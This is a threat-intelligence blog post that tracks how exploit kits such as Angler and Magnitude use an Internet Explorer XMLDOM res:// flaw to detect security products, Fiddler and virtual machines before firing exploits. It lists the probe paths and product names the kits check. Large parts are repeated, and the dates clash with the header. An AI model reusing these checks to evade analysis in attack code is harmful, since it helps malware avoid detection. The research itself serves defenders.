2014-10-02 - Exploit Integration
CVE-2013-7331/CVE-2015-2413 (onload variant) and Exploit Kits
Thanks to EKWatcher and his decoding skills saving me a lot of time.
As we can see more and more of those "XMLDOM" checks in exploit kits i decided to write here some of the checks spotted. This is a fast moving area and it will be hard to keep up to date with this, but this may give an idea of how it's being used.
Magnitude EK:
2015-09 [CVE-2015-2413 onload res:// variant ]
Won't details as this part of the code has been disparead around end of november 2015 then reappeared in middle of march inside the redirector in front of Magnitude
See: http://pastebin.com/raw/gfEz25fa (from 2016-03-30)
Angler EK:
2015-05-16 [Edit : I know that here some information are not totally exact]
[Edit2: appears to be something that was unpatched at that time and that has been fixed with the bug covered by CVE-2015-2413]
+="Malwarebytes Anti-Exploit\\mbae.exe", "Malwarebytes Anti-Malware\\mbam.exe", "FiddlerCoreAPI\\FiddlerCore.dll"
http://pastebin.com/0LrAy9gm
2014-11-25
+=
'res://C:\\Program Files\\Fiddler2\\Fiddler.exe/#3/#32512',
'res://C:\\Program Files (x86)\\Fiddler2\\Fiddler.exe/#3/#32512'
http://pastebin.com/BFWxLu22
2014-10-11
+ Avoid firing CVE-2013-2551 if Symantec product are detected (maybe also for CVE-2014-0322. Didn't check),
+Checks for :
res://C:\\Program Files\\VMware\\VMware Tools\\TPAutoConnSvc.exe/#2/#26567', 'res://C:\\Program Files\\VMware\\VMware Tools\\TPAutoConnSvc.exe/#2/#30996', 'res://C:\\Program Files\\Oracle\\VirtualBox Guest Additions\\uninst.exe/#2/#110',
'res://C:\\Program Files\\Parallels\\Parallels Tools\\Applications\\setup_nativelook.exe/#2/#204'];
Previously :
http://pastebin.com/pzx2xPDJ 2014-08-23
Astrum EK :
http://pastebin.com/PfAjuvPR 2014-09-06
Nuclear Pack :
Read more:
Attackers abusing Internet Explorer to enumerate software and detect security products - Jaime Blasco - AlienVault - 2014-07-25
Software enumeration using Internet Explorer - 2014-10-21 - HiddenCodes
Angler EK:
2015-05-16 [Edit : I know that here some information are not totally exact]
[Edit2: appears to be something that was unpatched at that time and that has been fixed with the bug covered by CVE-2015-2413]
+="Malwarebytes Anti-Exploit\\mbae.exe", "Malwarebytes Anti-Malware\\mbam.exe", "FiddlerCoreAPI\\FiddlerCore.dll"
 |
| Angler EK checks integrates MBAE and Mbam |
2014-11-25
+=
'res://C:\\Program Files\\Fiddler2\\Fiddler.exe/#3/#32512',
'res://C:\\Program Files (x86)\\Fiddler2\\Fiddler.exe/#3/#32512'
http://pastebin.com/BFWxLu22
2014-10-11
+ Avoid firing CVE-2013-2551 if Symantec product are detected (maybe also for CVE-2014-0322. Didn't check),
+Checks for :
res://C:\\Program Files\\VMware\\VMware Tools\\TPAutoConnSvc.exe/#2/#26567', 'res://C:\\Program Files\\VMware\\VMware Tools\\TPAutoConnSvc.exe/#2/#30996', 'res://C:\\Program Files\\Oracle\\VirtualBox Guest Additions\\uninst.exe/#2/#110',
'res://C:\\Program Files\\Parallels\\Parallels Tools\\Applications\\setup_nativelook.exe/#2/#204'];
 |
| http://pastebin.com/EAKZk43e 2014-10-01 |
http://pastebin.com/pzx2xPDJ 2014-08-23
Astrum EK :
http://pastebin.com/PfAjuvPR 2014-09-06
Nuclear Pack :
Gathering samples by browsing requires hardening too. Nuclear Pack tries to detect VMWare now. pic.twitter.com/W9Z1bgUJyv
— kafeine (@kafeine) September 28, 2014Read more:
Attackers abusing Internet Explorer to enumerate software and detect security products - Jaime Blasco - AlienVault - 2014-07-25
Software enumeration using Internet Explorer - 2014-10-21 - HiddenCodes